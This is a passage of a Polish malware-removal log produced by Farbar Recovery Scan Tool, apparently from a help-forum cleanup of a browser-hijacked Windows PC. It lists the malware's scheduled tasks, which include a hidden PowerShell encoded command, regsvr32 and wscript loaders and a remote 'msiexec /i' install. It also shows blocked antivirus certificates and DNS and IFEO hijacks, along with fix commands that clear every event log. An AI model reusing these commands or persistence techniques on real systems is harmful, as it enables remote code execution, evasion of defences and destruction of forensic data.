Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 21.01.2018 Uruchomiony przez administratorka (24-01-2018 15:24:59) Run:1 Uruchomiony z C:\Users\administratorka\Desktop Załadowane profile: administratorka (Dostępne profile: administratorka) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-478647955-3472351390-1182581596-1000\...\ChromeHTML: -> C:\Program Files (x86)\Cupduck\Application\chrome.exe (Google Inc.) <==== UWAGA C:\Program Files (x86)\Cupduck C:\Users\administratorka\AppData\Local\Cupduck C:\Users\administratorka\AppData\Roaming\Cupduck C:\Program Files (x86)\Firefox C:\Users\administratorka\AppData\Local\Firefox C:\Users\administratorka\AppData\Roaming\Firefox R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [116376 2017-05-23] () <==== UWAGA DeleteKey: HKCU\Software\Cupduck DeleteKey: HKLM\SOFTWARE\WOW6432Node\Cupduck DeleteKey: HKCU\Software\Firefox DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\administratorka\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\administratorka\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\administratorka\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\administratorka\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => Brak pliku CustomCLSID: 
HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\administratorka\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534}\InprocServer32 -> C:\Users\administratorka\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll => Brak pliku ContextMenuHandlers1_S-1-5-21-478647955-3472351390-1182581596-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => C:\Users\administratorka\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll -> Brak pliku ContextMenuHandlers4_S-1-5-21-478647955-3472351390-1182581596-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => C:\Users\administratorka\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll -> Brak pliku ContextMenuHandlers5_S-1-5-21-478647955-3472351390-1182581596-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => C:\Users\administratorka\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll -> Brak pliku Task: {32396D88-557C-4C4E-9B26-025EDAA48549} - \PowerWord-SCT-JT -> Brak pliku <==== UWAGA Task: {78DD82B5-91E5-44CD-92AD-5D158744913E} - \Windows-WoShiBeiYongDe -> Brak pliku <==== UWAGA Task: {58483EE7-A7F3-41C5-AD0E-22B2E1469AC7} - System32\Tasks\82F37914-A36A-6A79-9CCE-BAC5980BBB44 => C:\Windows\SysWOW64\regsvr32.exe /n /s /i:"/1190cf1e9d8bccd9 /q" "C:\Users\ADMINI~1\AppData\Local\78EB64~1\{65C50~1." 
Task: {CD5D4BB2-AF26-4D25-9B2E-D36BB41D916F} - System32\Tasks\{F55353F7-257A-4BE2-CE80-ED3F1C1ADC3E} => C:\Windows\system32\regsvr32.exe /s /n /i:"/rt" "C:\Users\ADMINI~1\AppData\Local\78EB64~1\65c50efb.dll" <==== UWAGA Task: {6F6305AB-354E-4BB0-8D8D-0AE54BB8D1F0} - System32\Tasks\{838FBDD6-4401-4BFC-8DBC-80C9694AD4AE} => C:\Windows\system32\pcalua.exe -a C:\Users\ADMINI~1\AppData\Local\Temp\lui1CF5.tmp\setup.exe -d C:\Users\ADMINI~1\AppData\Local\Temp\Rar$EXa0.977 <==== UWAGA Task: {82F5D2D1-674E-40C6-972E-CCADEED6C20A} - System32\Tasks\English To Chaser => C:\Windows\system32\rundll32.exe "C:\Program Files\English To Chaser\English To Chaser.dll",LOBbcwq <==== UWAGA Task: {C7E8A21F-1FAA-410A-BC72-8DFF12E1A01B} - System32\Tasks\Chromium lotas => "wscript.exe" "C:\ProgramData\{1C91D9F2-96D3-5334-1015-CD768A5746B8}\dodi.txt" "68747470733a2f2f6b6174756e61712e636f6d" "433a5c50726f6772616d446174615c7b31433931443946322d393644332d353333342d313031352d4344373638413537343642387d5c6d6973617361" "433a5c50726f6772616d446174615c7b31433931443946322d393644332d353333342d (dane wartości zawierają 84 znaków więcej). <==== UWAGA Task: {E9BDE757-84E7-4207-9089-B095B2313ECD} - System32\Tasks\{09097A47-090F-7A0F-0B11-0E090B7D1108} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgACAAOwA7ACAAIAA7ADsAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcAUAByAGUAZgBlAHIAZQBuAGMA (dane wartości zawierają 9568 znaków więcej). 
<==== UWAGA C:\Users\ADMINI~1\AppData\Local\78EB64~1 C:\Program Files\English To Chaser HKLM\...\RunOnce: [KOMPUTER01] => C:\Windows\TEMP\gC560.tmp.exe [209408 2018-01-24] () <==== UWAGA HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== UWAGA HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== UWAGA HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== UWAGA HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== UWAGA HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== UWAGA HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== UWAGA HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== UWAGA HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== UWAGA HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== UWAGA HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== UWAGA HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== UWAGA HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== UWAGA HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== UWAGA HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== UWAGA HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== UWAGA HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== UWAGA HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) 
<==== UWAGA HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== UWAGA HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== UWAGA HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== UWAGA HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== UWAGA HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== UWAGA HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== UWAGA HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== UWAGA HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== UWAGA HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== UWAGA HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== UWAGA HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== UWAGA HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. 
KG) <==== UWAGA HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== UWAGA HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== UWAGA HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== UWAGA HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== UWAGA HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== UWAGA HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== UWAGA HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== UWAGA HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== UWAGA HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== UWAGA HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== UWAGA HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== UWAGA HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== UWAGA HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== UWAGA HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) 
<==== UWAGA HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA HKU\S-1-5-21-478647955-3472351390-1182581596-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj1LNTU4MdhWFdRYFTM8FjF2MYZQNjQLOYI5MUFyFkM8RF== /q <==== UWAGA HKU\S-1-5-18\Control Panel\Desktop\\SCRNSAVE.EXE -> IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] GroupPolicy: Ograniczenia <==== UWAGA Tcpip\Parameters: [NameServer] 82.163.143.176 82.163.142.178 Tcpip\..\Interfaces\{8EF21497-7361-4F1C-A09C-A9A671FA6743}: [NameServer] 82.163.143.176 82.163.142.178 Toolbar: HKU\S-1-5-21-478647955-3472351390-1182581596-1000 -> Brak nazwy - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - Brak pliku HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.mylucky123.com/?type=hp&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.mylucky123.com/?type=hp&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.mylucky123.com/?type=hp&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB HKLM\Software\Wow6432Node\Microsoft\Internet 
Explorer\Main,Default_Page_URL = hxxp://www.mylucky123.com/?type=hp&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms} HKU\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.mylucky123.com/?type=hp&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB HKU\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.mylucky123.com/?type=hp&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms} SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms} SearchScopes: HKLM-x32 -> 
{33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms} SearchScopes: HKU\S-1-5-21-478647955-3472351390-1182581596-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms} CHR HomePage: Default -> hxxp://www.mylucky123.com/?type=hp&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB FF Plugin: @microsoft.com/GENUINE -> disabled [Brak pliku] FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Brak pliku] R2 WinCacheSrv; C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp [205826 ] () [Brak podpisu cyfrowego] <==== UWAGA C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp S2 CornerSunshineSvc; "C:\Program Files (x86)\Corner Sunshine\CornerSunshineSvc.exe" {8A712DBD-E08B-4D5C-839D-1B9C185FE769} [X] 2018-01-24 11:05 - 2016-10-21 14:12 - 000000000 _____ C:\Users\Public\Documents\report.dat 2018-01-24 11:03 - 2016-09-29 09:51 - 000001195 _____ C:\Users\Public\Documents\temp.dat 2018-01-19 13:55 - 2016-10-21 14:12 - 000000000 ____D C:\ProgramData\fjcfi 2018-01-19 13:55 - 2016-10-21 13:44 - 000000000 ____D C:\ProgramData\chuvc 2017-12-27 19:59 - 2017-12-29 20:59 - 000000068 _____ () C:\Users\administratorka\AppData\Local\YdozKPUZep C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Picasa 3.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverDoc\DriverDoc.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverDoc\Register DriverDoc.lnk C:\Users\administratorka\Desktop\Google 
Chrome.lnk C:\Users\administratorka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mozilla Firefox.lnk C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox (2).lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk ShortcutWithArgument: C:\Users\administratorka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.mylucky123.com/?type=sc&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\theHunter\theHunter.lnk -> D:\theHunter\launcher\launcher.exe (Expansive Worlds) -> hxxp://www.mylucky123.com/?type=sc&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox\Mozilla Firefox (Safe Mode).lnk -> C:\Program 
Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.mylucky123.com/?type=sc&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.mylucky123.com/?type=sc&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\administratorka\AppData\Local CMD: dir /a C:\Users\administratorka\AppData\LocalLow CMD: dir /a C:\Users\administratorkaAppData\Roaming CMD: netsh advfirewall reset CMD: ipconfig /flushdns Hosts: Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: ***************** Procesy zostały pomyślnie zamknięte. Punkt przywracania został pomyślnie utworzony. 
"HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\ChromeHTML" => pomyślnie usunięto C:\Program Files (x86)\Cupduck => pomyślnie przeniesiono C:\Users\administratorka\AppData\Local\Cupduck => pomyślnie przeniesiono "C:\Users\administratorka\AppData\Roaming\Cupduck" => nie znaleziono C:\Program Files (x86)\Firefox => pomyślnie przeniesiono C:\Users\administratorka\AppData\Local\Firefox => pomyślnie przeniesiono C:\Users\administratorka\AppData\Roaming\Firefox => pomyślnie przeniesiono "HKLM\System\CurrentControlSet\Services\FirefoxU" => pomyślnie usunięto FirefoxU => serwis pomyślnie usunięto "HKCU\Software\Cupduck" => pomyślnie usunięto "HKLM\SOFTWARE\WOW6432Node\Cupduck" => pomyślnie usunięto "HKCU\Software\Firefox" => pomyślnie usunięto "HKLM\SOFTWARE\WOW6432Node\Firefox" => pomyślnie usunięto "HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}" => pomyślnie usunięto "HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}" => pomyślnie usunięto "HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}" => pomyślnie usunięto "HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}" => pomyślnie usunięto "HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}" => pomyślnie usunięto "HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534}" => pomyślnie usunięto "HKU\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Classes\*\ShellEx\ContextMenuHandlers\GGDriveMenu" => pomyślnie usunięto HKU\S-1-5-21-478647955-3472351390-1182581596-1000\SOFTWARE\Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534} => klucz nie znaleziono "HKU\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Classes\Directory\ShellEx\ContextMenuHandlers\GGDriveMenu" => pomyślnie usunięto 
HKU\S-1-5-21-478647955-3472351390-1182581596-1000\SOFTWARE\Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534} => klucz nie znaleziono "HKU\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\GGDriveMenu" => pomyślnie usunięto HKU\S-1-5-21-478647955-3472351390-1182581596-1000\SOFTWARE\Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534} => klucz nie znaleziono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{32396D88-557C-4C4E-9B26-025EDAA48549} => niepowodzenie przy usuwaniu klucz. ErrorCode1: 0x00000002 "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{32396D88-557C-4C4E-9B26-025EDAA48549}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{78DD82B5-91E5-44CD-92AD-5D158744913E}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{78DD82B5-91E5-44CD-92AD-5D158744913E}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-WoShiBeiYongDe" => pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{58483EE7-A7F3-41C5-AD0E-22B2E1469AC7} => klucz nie znaleziono C:\Windows\System32\Tasks\82F37914-A36A-6A79-9CCE-BAC5980BBB44 => pomyślnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\82F37914-A36A-6A79-9CCE-BAC5980BBB44" => pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CD5D4BB2-AF26-4D25-9B2E-D36BB41D916F} => klucz nie znaleziono C:\Windows\System32\Tasks\{F55353F7-257A-4BE2-CE80-ED3F1C1ADC3E} => pomyślnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{F55353F7-257A-4BE2-CE80-ED3F1C1ADC3E}" => pomyślnie usunięto 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6F6305AB-354E-4BB0-8D8D-0AE54BB8D1F0}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6F6305AB-354E-4BB0-8D8D-0AE54BB8D1F0}" => pomyślnie usunięto C:\Windows\System32\Tasks\{838FBDD6-4401-4BFC-8DBC-80C9694AD4AE} => pomyślnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{838FBDD6-4401-4BFC-8DBC-80C9694AD4AE}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{82F5D2D1-674E-40C6-972E-CCADEED6C20A}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{82F5D2D1-674E-40C6-972E-CCADEED6C20A}" => pomyślnie usunięto C:\Windows\System32\Tasks\English To Chaser => pomyślnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\English To Chaser" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C7E8A21F-1FAA-410A-BC72-8DFF12E1A01B}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C7E8A21F-1FAA-410A-BC72-8DFF12E1A01B}" => pomyślnie usunięto C:\Windows\System32\Tasks\Chromium lotas => pomyślnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Chromium lotas" => 